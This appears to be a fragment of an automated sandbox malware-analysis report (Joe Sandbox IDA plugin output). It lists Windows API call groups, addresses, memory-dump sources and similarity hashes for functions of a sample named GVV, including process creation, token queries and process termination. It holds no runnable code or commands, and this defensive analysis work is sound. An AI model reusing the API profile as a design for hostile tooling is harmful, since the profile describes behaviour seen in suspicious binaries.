                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0018080C
                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00180847
                • EnterCriticalSection.KERNEL32(?), ref: 00180863
                • LeaveCriticalSection.KERNEL32(?), ref: 001808DC
                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001808F3
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00180921
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                • String ID:
                • API String ID: 3368777196-0
                • Opcode ID: 3d1f288548db4c7aa136ed7fe99d8ff43b630700e8e5603d9df747720cbc39eb
                • Instruction ID: f60f9554629d1c440a2c51b83ec138165571efc589c43b240e6d7979449f6db0
                • Opcode Fuzzy Hash: 3d1f288548db4c7aa136ed7fe99d8ff43b630700e8e5603d9df747720cbc39eb
                • Instruction Fuzzy Hash: 65414C71A00209EFDF15AF54DC85AAA77B8FF09310F1540B9ED04AA296D730DEA5DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0016F3AB,00000000,?,?,00000000,?,0016682C,00000004,00000000,00000000), ref: 001A824C
                • EnableWindow.USER32(00000000,00000000), ref: 001A8272
                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001A82D1
                • ShowWindow.USER32(00000000,00000004), ref: 001A82E5
                • EnableWindow.USER32(00000000,00000001), ref: 001A830B
                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 001A832F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Show$Enable$MessageSend
                • String ID:
                • API String ID: 642888154-0
                • Opcode ID: cc5063c892f25912aec8bd8498c3d4b646d4b4abe607e27cd7036222cb55ad87
                • Instruction ID: 2aa4b29f83597f78a0269fc71a9122d52056b03681d4c736ab866fd04cbeb2e8
                • Opcode Fuzzy Hash: cc5063c892f25912aec8bd8498c3d4b646d4b4abe607e27cd7036222cb55ad87
                • Instruction Fuzzy Hash: F841A138601644EFDF25CF54D899BE87BF1BF0BB14F1841A9E6484F2A2CB31A881CB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • IsWindowVisible.USER32(?), ref: 00174C95
                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00174CB2
                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00174CEA
                • _wcslen.LIBCMT ref: 00174D08
                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00174D10
                • _wcsstr.LIBVCRUNTIME ref: 00174D1A
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                • String ID:
                • API String ID: 72514467-0
                • Opcode ID: fcba7c8298bee4aa4f665d8d9e5f9ff4493b8a9f170f899d27a125e81916a24c
                • Instruction ID: 5bb40ace1f1cb85292e98c5214e1903170ec0fe88aee89dfb08b346d52b99915
                • Opcode Fuzzy Hash: fcba7c8298bee4aa4f665d8d9e5f9ff4493b8a9f170f899d27a125e81916a24c
                • Instruction Fuzzy Hash: 5B21D771204210BBEB269B79EC49EBB7BBCDF56760F11807DF80DCA191EB61DC4196A0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00113AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00113A97,?,?,00112E7F,?,?,?,00000000), ref: 00113AC2
                • _wcslen.LIBCMT ref: 0018587B
                • CoInitialize.OLE32(00000000), ref: 00185995
                • CoCreateInstance.OLE32(001AFCF8,00000000,00000001,001AFB68,?), ref: 001859AE
                • CoUninitialize.OLE32 ref: 001859CC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                • String ID: .lnk
                • API String ID: 3172280962-24824748
                • Opcode ID: fbd8c47094eb2d32b77916d8c4d04df8d15ba020eb0638f4a50878993dc622b2
                • Instruction ID: 45203284b0b464b2230eb994fd0dc7c51f993031a075a4b963476dd2dc27272f
                • Opcode Fuzzy Hash: fbd8c47094eb2d32b77916d8c4d04df8d15ba020eb0638f4a50878993dc622b2
                • Instruction Fuzzy Hash: 18D14475A086019FC718EF24C480A6ABBE2EF99714F14486DF8899B361D731EE45CF92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00170FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00170FCA
                  • Part of subcall function 00170FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00170FD6
                  • Part of subcall function 00170FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00170FE5
                  • Part of subcall function 00170FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00170FEC
                  • Part of subcall function 00170FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00171002
                • GetLengthSid.ADVAPI32(?,00000000,00171335), ref: 001717AE
                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001717BA
                • HeapAlloc.KERNEL32(00000000), ref: 001717C1
                • CopySid.ADVAPI32(00000000,00000000,?), ref: 001717DA
                • GetProcessHeap.KERNEL32(00000000,00000000,00171335), ref: 001717EE
                • HeapFree.KERNEL32(00000000), ref: 001717F5
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                • String ID:
                • API String ID: 3008561057-0
                • Opcode ID: 6434c0b6b8c923757f04cd3027fb43dbac89dc0c62d6525ff2217ffd97b82b8f
                • Instruction ID: 602eb46951015a45c7275813d8f4950d76a57bddc8780772e31d437d222d8ad4
                • Opcode Fuzzy Hash: 6434c0b6b8c923757f04cd3027fb43dbac89dc0c62d6525ff2217ffd97b82b8f
                • Instruction Fuzzy Hash: 7E119072600205FFDB189FA8CD49BAF7BB9EF46355F10C018F44597210D735A984CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001714FF
                • OpenProcessToken.ADVAPI32(00000000), ref: 00171506
                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00171515
                • CloseHandle.KERNEL32(00000004), ref: 00171520
                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0017154F
                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00171563
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                • String ID:
                • API String ID: 1413079979-0
                • Opcode ID: 697374fd56834e8d4284370ff45b77f9ccea9b8ee1ea8fc9012a4a443076d30b
                • Instruction ID: f79ab729a1f840a8f5147e87cb706244aaa59f4c3b0071c2d657eae0e3fff59d
                • Opcode Fuzzy Hash: 697374fd56834e8d4284370ff45b77f9ccea9b8ee1ea8fc9012a4a443076d30b
                • Instruction Fuzzy Hash: A9112976504209BBDF118F98DE49BDE7BB9EF49744F048015FA09A2160C3758EA4DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,?,00133379,00132FE5), ref: 00133390
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0013339E
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001333B7
                • SetLastError.KERNEL32(00000000,?,00133379,00132FE5), ref: 00133409
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 45a1a6dc830f161a9047be8e336ca6b9d8a4134a6403a6970d06990e59212046
                • Instruction ID: 0361914d7e5f495f6614d5e0e9e8c5c2d4439a959d2dc25685e0dd53be6851c5
                • Opcode Fuzzy Hash: 45a1a6dc830f161a9047be8e336ca6b9d8a4134a6403a6970d06990e59212046
                • Instruction Fuzzy Hash: 0A01D43360A312BEEA2927757CC6666AB95FB25379F20822AF430852F0EF114E45959C
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32(?,?,00145686,00153CD6,?,00000000,?,00145B6A,?,?,?,?,?,0013E6D1,?,001D8A48), ref: 00142D78
                • _free.LIBCMT ref: 00142DAB
                • _free.LIBCMT ref: 00142DD3
                • SetLastError.KERNEL32(00000000,?,?,?,?,0013E6D1,?,001D8A48,00000010,00114F4A,?,?,00000000,00153CD6), ref: 00142DE0
                • SetLastError.KERNEL32(00000000,?,?,?,?,0013E6D1,?,001D8A48,00000010,00114F4A,?,?,00000000,00153CD6), ref: 00142DEC
                • _abort.LIBCMT ref: 00142DF2
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 96dbb66944ee2abb55ceb5188771ffcb2e7ad45cde2cc640ba4bae4e3027aac3
                • Instruction ID: f53e79e74581891af96d2ebe00ca5d6160f5bf61735f5e8635641be5a267c08c
                • Opcode Fuzzy Hash: 96dbb66944ee2abb55ceb5188771ffcb2e7ad45cde2cc640ba4bae4e3027aac3
                • Instruction Fuzzy Hash: 09F04C31D05A1167C61273B5BC0AF1F265ABFD27B0F650519F824D31F2EF7088C141A0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00129639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00129693
                  • Part of subcall function 00129639: SelectObject.GDI32(?,00000000), ref: 001296A2
                  • Part of subcall function 00129639: BeginPath.GDI32(?), ref: 001296B9
                  • Part of subcall function 00129639: SelectObject.GDI32(?,00000000), ref: 001296E2
                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 001A8A4E
                • LineTo.GDI32(?,00000003,00000000), ref: 001A8A62
                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 001A8A70
                • LineTo.GDI32(?,00000000,00000003), ref: 001A8A80
                • EndPath.GDI32(?), ref: 001A8A90
                • StrokePath.GDI32(?), ref: 001A8AA0
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                • String ID:
                • API String ID: 43455801-0
                • Opcode ID: b2e04ccfa0a9b53d3f9d538051bb53270228fd49e6a0020886b7253b7e90d281
                • Instruction ID: 6d84b271374f59f5244ce0c19b6f00e3a3ac83f7f3db4ad8afa6c41267a4abbc
                • Opcode Fuzzy Hash: b2e04ccfa0a9b53d3f9d538051bb53270228fd49e6a0020886b7253b7e90d281
                • Instruction Fuzzy Hash: 41111B7A00014CFFDF129F94DC88EAA7F6CEB09354F008012BA199A5A1C7719D95DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetDC.USER32(00000000), ref: 00175218
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00175229
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00175230
                • ReleaseDC.USER32(00000000,00000000), ref: 00175238
                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0017524F
                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00175261
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: 65885af72156d627211992919e95cd27926315d71fd8a763b028077bc8e4dbfa
                • Instruction ID: f3c25c3d88ce2fe4f65224416d8d66846f082e35149e6f7e9a3b89b06fce5c14
                • Opcode Fuzzy Hash: 65885af72156d627211992919e95cd27926315d71fd8a763b028077bc8e4dbfa
                • Instruction Fuzzy Hash: 2F014F75A00718BBEB109BA59C49A5EBFB9EB49751F044065FA08A7781D6709C00CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00111BF4
                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00111BFC
                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00111C07
                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00111C12
                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00111C1A
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00111C22
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Virtual
                • String ID:
                • API String ID: 4278518827-0
                • Opcode ID: 13951068dc042801aa99f6873b555ab6b6ff04791f3969a0da53c4c956c5386a
                • Instruction ID: d117ab98a09e689fee3027a253f2e60b82a5aa80edc197e0cb47c8bd3e5e7006
                • Opcode Fuzzy Hash: 13951068dc042801aa99f6873b555ab6b6ff04791f3969a0da53c4c956c5386a
                • Instruction Fuzzy Hash: 2B016CB09027597DE3008F5A8C85B52FFE8FF19354F04411B915C47A41C7F5A864CBE5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0017EB30
                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0017EB46
                • GetWindowThreadProcessId.USER32(?,?), ref: 0017EB55
                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0017EB64
                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0017EB6E
                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0017EB75
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                • String ID:
                • API String ID: 839392675-0
                • Opcode ID: 443e1bdf59117ef82cb0355ab71d6b99cdc65b1e269300fe3843b725185d0c23
                • Instruction ID: c3e34cd7768ebd92e546e67467334c32fb1e35e87afdc8a80336564aba1bfb96
                • Opcode Fuzzy Hash: 443e1bdf59117ef82cb0355ab71d6b99cdc65b1e269300fe3843b725185d0c23
                • Instruction Fuzzy Hash: 05F05E72240158BBE7219B629C0EEEF3E7CEFCBB11F004159F605D1591EBA05A41CAF5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetClientRect.USER32(?), ref: 00167452
                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00167469
                • GetWindowDC.USER32(?), ref: 00167475
                • GetPixel.GDI32(00000000,?,?), ref: 00167484
                • ReleaseDC.USER32(?,00000000), ref: 00167496
                • GetSysColor.USER32(00000005), ref: 001674B0
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                • String ID:
                • API String ID: 272304278-0
                • Opcode ID: 4cbfcb1fc273c867c19485bf48b9bb26a81e76a63756911961b77674390bf924
                • Instruction ID: 7de0dc9614101939074107e66a1d48b41d55f05a1f4daab36e702da7d819ddb8
                • Opcode Fuzzy Hash: 4cbfcb1fc273c867c19485bf48b9bb26a81e76a63756911961b77674390bf924
                • Instruction Fuzzy Hash: 20014B31500215EFDB519FA4DD08BEEBBB6FB05321F550164F919A25A1CF311E91AB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0017187F
                • UnloadUserProfile.USERENV(?,?), ref: 0017188B
                • CloseHandle.KERNEL32(?), ref: 00171894
                • CloseHandle.KERNEL32(?), ref: 0017189C
                • GetProcessHeap.KERNEL32(00000000,?), ref: 001718A5
                • HeapFree.KERNEL32(00000000), ref: 001718AC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                • String ID:
                • API String ID: 146765662-0
                • Opcode ID: a2d56a6d5bb025462003362052c59db3a239f5ca7d8e48ffbe44ebe80b5c841d
                • Instruction ID: c53716c962698366f64d0a2bb616f4b536dba1c36b47ade87f176c2d493f4459
                • Opcode Fuzzy Hash: a2d56a6d5bb025462003362052c59db3a239f5ca7d8e48ffbe44ebe80b5c841d
                • Instruction Fuzzy Hash: 45E07576204505FBDB015FA5ED0C94ABF79FF4AB22B508625F22581871DB3294A1DF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00117620: _wcslen.LIBCMT ref: 00117625
                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0017C6EE
                • _wcslen.LIBCMT ref: 0017C735
                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0017C79C
                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0017C7CA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ItemMenu$Info_wcslen$Default
                • String ID: 0
                • API String ID: 1227352736-4108050209
                • Opcode ID: 9b36d0f61ed3255403e10a56edccb3cd676afe6c2e69cbab3dd428cc7d8ff297
                • Instruction ID: 1070b78ace65f88988b536de3c9cb5edd5809bbe8ae0e4742d2389ab83f14f92
                • Opcode Fuzzy Hash: 9b36d0f61ed3255403e10a56edccb3cd676afe6c2e69cbab3dd428cc7d8ff297
                • Instruction Fuzzy Hash: D751E0716043419BD7189F28C885BAF77F8AF99314F048A2DF999E3290DB70D944CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ShellExecuteExW.SHELL32(0000003C), ref: 0019AEA3
                  • Part of subcall function 00117620: _wcslen.LIBCMT ref: 00117625
                • GetProcessId.KERNEL32(00000000), ref: 0019AF38
                • CloseHandle.KERNEL32(00000000), ref: 0019AF67
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CloseExecuteHandleProcessShell_wcslen
                • String ID: <$@
                • API String ID: 146682121-1426351568
                • Opcode ID: f3420370281f71c74e898ee2b665a0132b6318b3392ba5c4e39faa0f3ec85760
                • Instruction ID: 4e36e5fdaa8707bb64070ae9e5eb06aac5ce8799bf1dccef87ecc53bbaade7f3
                • Opcode Fuzzy Hash: f3420370281f71c74e898ee2b665a0132b6318b3392ba5c4e39faa0f3ec85760
                • Instruction Fuzzy Hash: D5715570A00219DFCF18DF64D494A9EBBF1BF08314F4484A9E816AB792CB74ED85CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00177206
                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0017723C
                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0017724D
                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001772CF
                Strings
                Memory Dump Source
